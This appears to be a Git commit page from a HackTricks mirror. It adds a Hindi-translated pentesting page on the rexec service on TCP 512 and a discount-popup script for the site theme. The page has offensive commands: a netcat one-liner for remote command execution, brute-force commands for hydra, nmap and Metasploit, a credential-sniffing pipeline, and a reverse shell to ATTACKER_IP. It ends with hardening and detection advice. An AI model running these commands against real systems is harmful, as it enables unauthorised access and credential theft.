maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/512-pentesting-rexec.md'] t

Browse Source
This commit is contained in:
Translator 2025-07-15 22:08:50 +00:00
parent 5a86990fe4
commit 0f3d4e87eb
2 changed files with 167 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
src/network-services-pentesting/512-pentesting-rexec.md
View File

@ -2,17 +2,103 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
यह एक सेवा है जो **आपको एक होस्ट के अंदर एक कमांड निष्पादित करने की अनुमति देती है** यदि आप मान्य **क्रेडेंशियल्स** (उपयोगकर्ता नाम और पासवर्ड) जानते हैं
Rexec (remote **exec**) मूल Berkeley *r*-services सूट में से एक है (जिसमें `rlogin`, `rsh`, … शामिल हैं)। यह **एक दूरस्थ कमांड-निष्पादन** क्षमता प्रदान करता है **जो केवल स्पष्ट-टेक्स्ट उपयोगकर्ता नाम और पासवर्ड के साथ प्रमाणित होता है**। इस प्रोटोकॉल को 1980 के दशक की शुरुआत में परिभाषित किया गया था (देखें RFC 1060) और आज इसे **डिजाइन द्वारा असुरक्षित** माना जाता है। फिर भी, यह कुछ विरासती UNIX / नेटवर्क-से जुड़े उपकरणों में डिफ़ॉल्ट रूप से सक्षम है और कभी-कभी आंतरिक pentests के दौरान दिखाई देता है
**डिफ़ॉल्ट पोर्ट:** 512
**डिफ़ॉल्ट पोर्ट:** TCP 512 (`exec`)
```
PORT STATE SERVICE
512/tcp open exec
```
### [**ब्रूट-फोर्स**](../generic-hacking/brute-force.md#rexec)
> 🔥 सभी ट्रैफ़िक - जिसमें क्रेडेंशियल्स शामिल हैं - **असंक्रमित** रूप से प्रेषित होता है। नेटवर्क को स्निफ़ करने की क्षमता रखने वाला कोई भी व्यक्ति उपयोगकर्ता नाम, पासवर्ड और कमांड को पुनर्प्राप्त कर सकता है।
### प्रोटोकॉल त्वरित अवलोकन
1. क्लाइंट TCP 512 से कनेक्ट होता है।
2. क्लाइंट तीन **NUL-terminated** स्ट्रिंग्स भेजता है:
* पोर्ट नंबर (ASCII के रूप में) जहां वह stdout/stderr प्राप्त करना चाहता है (अक्सर `0`),
* **उपयोगकर्ता नाम**,
* **पासवर्ड**
3. निष्पादित करने के लिए एक अंतिम NUL-terminated स्ट्रिंग के साथ **कमांड** भेजा जाता है।
4. सर्वर एकल 8-बिट स्थिति बाइट (0 = सफलता, `1` = विफलता) के साथ प्रतिक्रिया करता है, इसके बाद कमांड आउटपुट होता है।
इसका मतलब है कि आप `echo -e` और `nc` के अलावा कुछ भी नहीं लेकर आदान-प्रदान को पुन: उत्पन्न कर सकते हैं:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
यदि क्रेडेंशियल मान्य हैं, तो आपको उसी कनेक्शन पर सीधे `id` का आउटपुट प्राप्त होगा।
### क्लाइंट के साथ मैनुअल उपयोग
कई लिनक्स वितरण अभी भी **inetutils-rexec** / **rsh-client** पैकेज के अंदर पुराना क्लाइंट प्रदान करते हैं:
```bash
rexec -l user -p password <target> "uname -a"
```
यदि `-p` को छोड़ दिया गया है, तो क्लाइंट पासवर्ड के लिए इंटरैक्टिव रूप से संकेत देगा (जो कि वायर पर स्पष्ट पाठ में दिखाई देगा!)।
---
## Enumeration & Brute-forcing
### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
### Nmap
```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
`rexec-brute` NSE उपरोक्त वर्णित प्रोटोकॉल का उपयोग करके बहुत तेजी से क्रेडेंशियल्स का प्रयास करता है।
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` का एक समर्पित **rexec** मॉड्यूल है और यह सबसे तेज़ ऑफ़लाइन ब्रूटफोर्सर बना रहता है। `medusa` (`-M REXEC`) और `ncrack` (`rexec` मॉड्यूल) का उपयोग उसी तरह किया जा सकता है।
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
मॉड्यूल सफल होने पर एक शेल उत्पन्न करेगा और क्रेडेंशियल्स को डेटाबेस में स्टोर करेगा।
---
## क्रेडेंशियल्स की स्निफिंग
क्योंकि सब कुछ स्पष्ट-टेक्स्ट में है, **नेटवर्क कैप्चर अमूल्य हैं**। ट्रैफ़िक की एक प्रति के साथ आप लक्ष्य को छुए बिना क्रेड्स निकाल सकते हैं:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
```
(In Wireshark में *Decode As …​* TCP 512 → REXEC सक्षम करें ताकि अच्छी तरह से पार्स किए गए फ़ील्ड देख सकें।)
---
## Post-Exploitation tips
* दिए गए उपयोगकर्ता के विशेषाधिकारों के साथ कमांड चलाए जाते हैं। यदि `/etc/pam.d/rexec` गलत तरीके से कॉन्फ़िगर किया गया है (जैसे `pam_rootok`), तो कभी-कभी रूट शेल संभव होते हैं।
* Rexec उपयोगकर्ता के शेल की अनदेखी करता है और कमांड को `/bin/sh -c <cmd>` के माध्यम से निष्पादित करता है। इसलिए आप कई कमांड को जोड़ने या रिवर्स शेल उत्पन्न करने के लिए सामान्य शेल-एस्केप ट्रिक्स (`;`, ``$( )``, बैकटिक) का उपयोग कर सकते हैं:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* पासवर्ड अक्सर अन्य सिस्टम पर **~/.netrc** में संग्रहीत होते हैं; यदि आप एक होस्ट से समझौता करते हैं तो आप उन्हें पार्श्व आंदोलन के लिए पुन: उपयोग कर सकते हैं।
---
## Hardening / Detection
* **rexec को उजागर न करें**; इसे SSH से बदलें। लगभग सभी आधुनिक *inetd* सुपर सर्वर डिफ़ॉल्ट रूप से सेवा को टिप्पणी करते हैं।
* यदि आपको इसे बनाए रखना है, तो TCP wrappers (`/etc/hosts.allow`) या फ़ायरवॉल नियमों के साथ पहुंच को सीमित करें और प्रति-खाता मजबूत पासवर्ड लागू करें।
* :512 पर ट्रैफ़िक और `rexecd` प्रक्रिया लॉन्च के लिए निगरानी रखें। एकल पैकेट कैप्चर समझौते का पता लगाने के लिए पर्याप्त है।
* `rexec`, `rlogin`, `rsh` को एक साथ निष्क्रिय करें - वे अधिकांश समान कोडबेस और कमजोरियों को साझा करते हैं।
---
## References
* Nmap NSE `rexec-brute` दस्तावेज़ [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit मॉड्यूल `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}}

79
theme/ai.js
View File

@ -1,11 +1,86 @@
/**
* HackTricks Training Discounts
*/
(() => {
const KEY = 'htSummerDiscountDismissed';
const IMG = '/images/discount.jpeg';
const TXT = 'HT Summer Discount, Last Days!';
/* Stop if user already dismissed */
if (localStorage.getItem(KEY) === 'true') return;
/* Quick helper */
const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
/* --- Overlay (blur + dim) --- */
const overlay = $('div', `
position: fixed; inset: 0;
background: rgba(0,0,0,.4);
backdrop-filter: blur(6px);
display: flex; justify-content: center; align-items: center;
z-index: 10000;
`);
/* --- Modal --- */
const modal = $('div', `
max-width: 90vw; width: 480px;
background: #fff; border-radius: 12px; overflow: hidden;
box-shadow: 0 8px 24px rgba(0,0,0,.35);
font-family: system-ui, sans-serif;
display: flex; flex-direction: column; align-items: stretch;
`);
/* --- Title bar (separate, over image) --- */
const titleBar = $('div', `
padding: 1rem; text-align: center;
background: #222; color: #fff;
font-size: 1.3rem; font-weight: 700;
`);
titleBar.textContent = TXT;
/* --- Image --- */
const img = $('img');
img.src = IMG; img.alt = TXT; img.style.width = '100%';
/* --- Checkbox row --- */
const label = $('label', `
display: flex; align-items: center; justify-content: center; gap: .6rem;
padding: 1rem; font-size: 1rem; color: #222; cursor: pointer;
`);
const cb = $('input'); cb.type = 'checkbox'; cb.style.scale = '1.2';
cb.onchange = () => {
if (cb.checked) {
localStorage.setItem(KEY, 'true');
overlay.remove();
}
};
label.append(cb, document.createTextNode("Don't show again"));
/* --- Assemble & inject --- */
modal.append(titleBar, img, label);
overlay.appendChild(modal);
(document.readyState === 'loading'
? () => document.addEventListener('DOMContentLoaded', () => document.body.appendChild(overlay), { once: true })
: () => document.body.appendChild(overlay))();
})();
/**
* HackTricks AI Chat Widget v1.16 resizable sidebar
* ---------------------------------------------------
* Markdown rendering + sanitised (same as before)
* NEW: dragtoresize panel, width persists via localStorage
*/
(function () {
const LOG = "[HackTricksAI]";
const LOG = "[HackTricks-AI]";
/* ---------------- Usertunable constants ---------------- */
const MAX_CONTEXT = 3000; // highlightedtext char limit
const MAX_QUESTION = 500; // question char limit
@ -13,7 +88,7 @@
const MAX_W = 600;
const DEF_W = 350; // default width (if nothing saved)
const TOOLTIP_TEXT =
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
const API_BASE = "https://www.hacktricks.ai/api/assistants/threads";
const BRAND_RED = "#b31328";